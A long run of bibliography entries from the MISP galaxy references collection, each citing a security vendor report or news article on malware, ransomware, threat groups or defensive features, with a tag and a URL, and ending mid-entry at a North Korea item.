Bleeping Computer Evil Corp mimics PayloadBin gang 2022

Abrams, L. (2021, June 6). New Evil Corp ransomware mimics PayloadBin gang to evade US sanctions. Retrieved July 19, 2022.

The tag is: misp-galaxy:references="Bleeping Computer Evil Corp mimics PayloadBin gang 2022"

Table 14644. Table References

Links

https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/

Microsoft Block Office Macros

Windows Defender Research. (2016, March 22). New feature in Office 2016 can block macros and help prevent infection. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Microsoft Block Office Macros"

Table 14645. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/

TechNet Office Macro Security

Microsoft Malware Protection Center. (2016, March 22). New feature in Office 2016 can block macros and help prevent infection. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="TechNet Office Macro Security"

Table 14646. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/

SolarWinds Sunburst Sunspot Update January 2021

Sudhakar Ramakrishna. (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.

The tag is: misp-galaxy:references="SolarWinds Sunburst Sunspot Update January 2021"

Table 14647. Table References

Links

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

BleepingComp Godlua JUL19

Gatlan, S. (2019, July 3). New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="BleepingComp Godlua JUL19"

Table 14648. Table References

Links

https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/

HTML Smuggling Menlo Security 2020

Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.

The tag is: misp-galaxy:references="HTML Smuggling Menlo Security 2020"

Table 14649. Table References

Links

https://www.menlosecurity.com/blog/new-attack-alert-duri

Microsoft New-InboxRule

Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.

The tag is: misp-galaxy:references="Microsoft New-InboxRule"

Table 14650. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps

AWS - IAM Console Best Practices

Moncur, Rob. (2020, July 5). New Information in the AWS IAM Console Helps You Follow IAM Best Practices. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="AWS - IAM Console Best Practices"

Table 14651. Table References

Links

https://aws.amazon.com/blogs/security/newly-updated-features-in-the-aws-iam-console-help-you-adhere-to-iam-best-practices/

Trend Micro Ransomware February 2021

Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="Trend Micro Ransomware February 2021"

Table 14652. Table References

Links

https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

Avast CCleaner3 2018

Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.

The tag is: misp-galaxy:references="Avast CCleaner3 2018"

Table 14653. Table References

Links

https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities

Tsunami

Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Tsunami"

Table 14654. Table References

Links

https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

amnesia malware

Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="amnesia malware"

Table 14655. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/

ClearSky Siamesekitten August 2021

ClearSky Cyber Security. (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.

The tag is: misp-galaxy:references="ClearSky Siamesekitten August 2021"

Table 14656. Table References

Links

https://www.clearskysec.com/siamesekitten/

Unit 42 NOKKI Sept 2018

Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Unit 42 NOKKI Sept 2018"

Table 14657. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

Malwarebytes Higaisa 2020

Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021.

The tag is: misp-galaxy:references="Malwarebytes Higaisa 2020"

Table 14658. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/

Gallagher 2015

Gallagher, S. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.

The tag is: misp-galaxy:references="Gallagher 2015"

Table 14659. Table References

Links

http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

FireEye TLS Nov 2017

Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="FireEye TLS Nov 2017"

Table 14660. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

FireEye Ursnif Nov 2017

Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="FireEye Ursnif Nov 2017"

Table 14661. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

Antiquated Mac Malware

Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Antiquated Mac Malware"

Table 14662. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

Trend Micro MacOS Backdoor November 2020

Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.

The tag is: misp-galaxy:references="Trend Micro MacOS Backdoor November 2020"

Table 14663. Table References

Links

https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

TrendMicro MacOS April 2018

Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="TrendMicro MacOS April 2018"

Table 14664. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/

TrendMicro macOS Dacls May 2020

Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="TrendMicro macOS Dacls May 2020"

Table 14665. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/

OSX Malware Exploits MacKeeper

Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="OSX Malware Exploits MacKeeper"

Table 14666. Table References

Links

https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html

Carbon Black Shlayer Feb 2019

Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.

The tag is: misp-galaxy:references="Carbon Black Shlayer Feb 2019"

Table 14667. Table References

Links

https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/

Palo Alto Rover

Ray, V., Hayashi, K. (2016, February 29). New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016.

The tag is: misp-galaxy:references="Palo Alto Rover"

Table 14668. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/

Palo Alto Reaver Nov 2017

Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Palo Alto Reaver Nov 2017"

Table 14669. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

Trend Micro Xbash Sept 2018

Trend Micro. (2018, September 19). New Multi-Platform Xbash Packs Obfuscation, Ransomware, Coinminer, Worm and Botnet. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Trend Micro Xbash Sept 2018"

Table 14670. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/new-multi-platform-xbash-packs-obfuscation-ransomware-coinminer-worm-and-botnet

MSRC Nobelium June 2021

MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="MSRC Nobelium June 2021"

Table 14671. Table References

Links

https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/

Symantec Orangeworm April 2018

Symantec Security Response Attack Investigation Team. (2018, April 23). New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia. Retrieved May 8, 2018.

The tag is: misp-galaxy:references="Symantec Orangeworm April 2018"

Table 14672. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

OSX.Dok Malware

Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.

The tag is: misp-galaxy:references="OSX.Dok Malware"

Table 14673. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

OSX Keydnap malware

Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="OSX Keydnap malware"

Table 14674. Table References

Links

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Intego Shlayer Apr 2018

Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.

The tag is: misp-galaxy:references="Intego Shlayer Apr 2018"

Table 14675. Table References

Links

https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/

Cybereason Linux Exim Worm

Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="Cybereason Linux Exim Worm"

Table 14676. Table References

Links

https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

Microsoft Prestige ransomware October 2022

MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.

The tag is: misp-galaxy:references="Microsoft Prestige ransomware October 2022"

Table 14677. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

Unit 42 MechaFlounder March 2019

Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="Unit 42 MechaFlounder March 2019"

Table 14678. Table References

Links

https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/

Talos Nyetya June 2017

Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.

The tag is: misp-galaxy:references="Talos Nyetya June 2017"

Table 14679. Table References

Links

https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

Cyble Black Basta May 2022

Cyble. (2022, May 6). New ransomware variant targeting high-value organizations. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="Cyble Black Basta May 2022"

Table 14680. Table References

Links

https://blog.cyble.com/2022/05/06/black-basta-ransomware/

Bleepingcomputer RAT malware 2020

Abrams, L. (2020, October 23). New RAT malware gets commands via Discord, has ransomware feature. Retrieved April 1, 2021.

The tag is: misp-galaxy:references="Bleepingcomputer RAT malware 2020"

Table 14681. Table References

Links

https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/

IBM ITG18 2020

Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.

The tag is: misp-galaxy:references="IBM ITG18 2020"

Table 14682. Table References

Links

https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/

new_rogue_DHCP_serv_malware

Irwin, Ullrich, J. (2009, March 16). new rogue-DHCP server malware. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="new_rogue_DHCP_serv_malware"

Table 14683. Table References

Links

https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/

NCSC CISA Cyclops Blink Advisory February 2022

NCSC, CISA, FBI, NSA. (2022, February 23). New Sandworm malware Cyclops Blink replaces VPNFilter. Retrieved March 3, 2022.

The tag is: misp-galaxy:references="NCSC CISA Cyclops Blink Advisory February 2022"

Table 14684. Table References

Links

https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter

Eweek Newscaster and Charming Kitten May 2014

Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Eweek Newscaster and Charming Kitten May 2014"

Table 14685. Table References

Links

https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering

Deep Instinct TA505 Apr 2019

Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Deep Instinct TA505 Apr 2019"

Table 14686. Table References

Links

https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/

Janicab

Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.

The tag is: misp-galaxy:references="Janicab"

Table 14687. Table References

Links

http://www.thesafemac.com/new-signed-malware-called-janicab/

MSTIC NOBELIUM May 2021

Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.

The tag is: misp-galaxy:references="MSTIC NOBELIUM May 2021"

Table 14688. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

Microsoft Phosphorus Mar 2019

Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="Microsoft Phosphorus Mar 2019"

Table 14689. Table References

Links

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

FireEye SUNSHUTTLE Mar 2021

Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.

The tag is: misp-galaxy:references="FireEye SUNSHUTTLE Mar 2021"

Table 14690. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

Blasco 2013

Blasco, J. (2013, March 21). New Sykipot developments [Blog]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Blasco 2013"

Table 14691. Table References

Links

http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments

Malwarebytes Targeted Attack against Saudi Arabia

Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Malwarebytes Targeted Attack against Saudi Arabia"

Table 14692. Table References

Links

https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/

FireEye APT34 Dec 2017

Sardiwal, M., et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="FireEye APT34 Dec 2017"

Table 14693. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

Unit 42 Cobalt Gang Oct 2018

Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018.

The tag is: misp-galaxy:references="Unit 42 Cobalt Gang Oct 2018"

Table 14694. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/

ESET TeleBots Oct 2018

Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.

The tag is: misp-galaxy:references="ESET TeleBots Oct 2018"

Table 14695. Table References

Links

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

Unit 42 DarkHydrus July 2018

Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.

The tag is: misp-galaxy:references="Unit 42 DarkHydrus July 2018"

Table 14696. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

Bitdefender Trickbot March 2020

Tudorica, R., Maximciuc, A., Vatamanu, C. (2020, March 18). New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong. Retrieved March 15, 2021.

The tag is: misp-galaxy:references="Bitdefender Trickbot March 2020"

Table 14697. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf

Malwarebytes Konni Aug 2021

Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.

The tag is: misp-galaxy:references="Malwarebytes Konni Aug 2021"

Table 14698. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/

Proofpoint Vega Credential Stealer May 2018

Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="Proofpoint Vega Credential Stealer May 2018"

Table 14699. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign

Proofpoint Azorult July 2018

Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.

The tag is: misp-galaxy:references="Proofpoint Azorult July 2018"

Table 14700. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

Avira Mustang Panda January 2020

Hamzeloofard, S. (2020, January 31). New wave of PlugX targets Hong Kong | Avira Blog. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Avira Mustang Panda January 2020"

Table 14701. Table References

Links

https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong

PaloAlto DNS Requests May 2016

Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.

The tag is: misp-galaxy:references="PaloAlto DNS Requests May 2016"

Table 14702. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

Palo Alto DNS Requests

Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Palo Alto DNS Requests"

Table 14703. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

Unit42 Azorult Nov 2018

Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.

The tag is: misp-galaxy:references="Unit42 Azorult Nov 2018"

Table 14704. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/

FireEye Clandestine Fox

Chen, X., Scott, M., Caselden, D. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="FireEye Clandestine Fox"

Table 14705. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html

Twitter ItsReallyNick Platinum Masquerade

Carr, N. (2018, October 25). Nick Carr Status Update. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Twitter ItsReallyNick Platinum Masquerade"

Table 14706. Table References

Links

https://twitter.com/ItsReallyNick/status/1055321868641689600

Twitter ItsReallyNick APT32 pubprn Masquerade

Carr, N. (2017, December 26). Nick Carr Status Update APT32 pubprn. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Twitter ItsReallyNick APT32 pubprn Masquerade"

Table 14707. Table References

Links

https://twitter.com/ItsReallyNick/status/945681177108762624

Twitter ItsReallyNick APT41 EK

Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="Twitter ItsReallyNick APT41 EK"

Table 14708. Table References

Links

https://twitter.com/ItsReallyNick/status/1189622925286084609

Twitter ItsReallyNick Masquerading Update

Carr, N. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Twitter ItsReallyNick Masquerading Update"

Table 14709. Table References

Links

https://twitter.com/ItsReallyNick/status/1055321652777619457

SecureWorks NICKEL GLADSTONE profile Sept 2021

SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="SecureWorks NICKEL GLADSTONE profile Sept 2021"

Table 14710. Table References

Links

https://www.secureworks.com/research/threat-profiles/nickel-gladstone

Microsoft NICKEL December 2021

MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022.

The tag is: misp-galaxy:references="Microsoft NICKEL December 2021"

Table 14711. Table References

Links

https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe

Nicolas Falliere, Liam O Murchu, Eric Chien February 2011

Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.

The tag is: misp-galaxy:references="Nicolas Falliere, Liam O Murchu, Eric Chien February 2011"

Table 14712. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf

ProofPoint Ursnif Aug 2016

Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="ProofPoint Ursnif Aug 2016"

Table 14713. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

NIST Server Security July 2008

Scarfone, K. et al. (2008, July). NIST Special Publication 800-123 - Guide to General Server Security. Retrieved July 26, 2018.

The tag is: misp-galaxy:references="NIST Server Security July 2008"

Table 14714. Table References

Links

https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf

Netskope Nitol

Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Netskope Nitol"

Table 14715. Table References

Links

https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique

FireEye Njw0rm Aug 2013

Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="FireEye Njw0rm Aug 2013"

Table 14716. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html

Nltest Manual

ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Nltest Manual"

Table 14717. Table References

Links

https://ss64.com/nt/nltest.html

Nmap: the Network Mapper

Nmap. (n.d.). Nmap: the Network Mapper - Free Security Scanner. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Nmap: the Network Mapper"

Table 14718. Table References

Links

https://nmap.org/

MSTIC Nobelium Oct 2021

Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="MSTIC Nobelium Oct 2021"

Table 14719. Table References

Links

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/

Microsoft Nobelium Admin Privileges

Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved January 31, 2022.

The tag is: misp-galaxy:references="Microsoft Nobelium Admin Privileges"

Table 14720. Table References

Links

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks

Symantec Noberus September 22 2022

Symantec Threat Hunter Team. (2022, September 22). Noberus Ransomware: Darkside and BlackMatter Successor Continues to Evolve its Tactics. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Symantec Noberus September 22 2022"

Table 14721. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

new_rust_based_ransomware

Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="new_rust_based_ransomware"

Table 14722. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware

SentinelOne NobleBaron June 2021

Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="SentinelOne NobleBaron June 2021"

Table 14723. Table References

Links

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

NodeJS

OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="NodeJS"

Table 14724. Table References

Links

https://nodejs.org/

Mandiant No Easy Breach

Dunwoody, M. and Carr, N. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016.

The tag is: misp-galaxy:references="Mandiant No Easy Breach"

Table 14725. Table References

Links

http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016

ESET PipeMon May 2020

Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="ESET PipeMon May 2020"

Table 14726. Table References

Links

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

nohup Linux Man

Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023.

The tag is: misp-galaxy:references="nohup Linux Man"

Table 14727. Table References

Links

https://linux.die.net/man/1/nohup

Unit 42 Nokki Oct 2018

Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Unit 42 Nokki Oct 2018"

Table 14728. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

ESET Nomadic Octopus 2018

Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="ESET Nomadic Octopus 2018"

Table 14729. Table References

Links

https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf

Malwarebytes Pony April 2016

hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.

The tag is: misp-galaxy:references="Malwarebytes Pony April 2016"

Table 14730. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/

WithSecure Lazarus-NoPineapple Threat Intel Report 2023

Ruohonen, S. & Robinson, S. (2023, February 2). No Pineapple! - DPRK Targeting of Medical Research and Technology Sector. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="WithSecure Lazarus-NoPineapple Threat Intel Report 2023"

Table 14731. Table References

Links

https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

xorrior chrome extensions macOS

Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.

The tag is: misp-galaxy:references="xorrior chrome extensions macOS"

Table 14732. Table References

Links

https://www.xorrior.com/No-Place-Like-Chrome/

Cybernews Yanfeng Qilin November 2023

Stefanie Schappert. (2023, November 28). North American auto supplier Yanfeng claimed by Qilin ransom group. Retrieved November 30, 2023.

The tag is: misp-galaxy:references="Cybernews Yanfeng Qilin November 2023"

Table 14733. Table References

Links

https://cybernews.com/news/yanfeng-ransomware-attack-claimed-qilin/

The Hacker News Lazarus Aug 2022

Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.

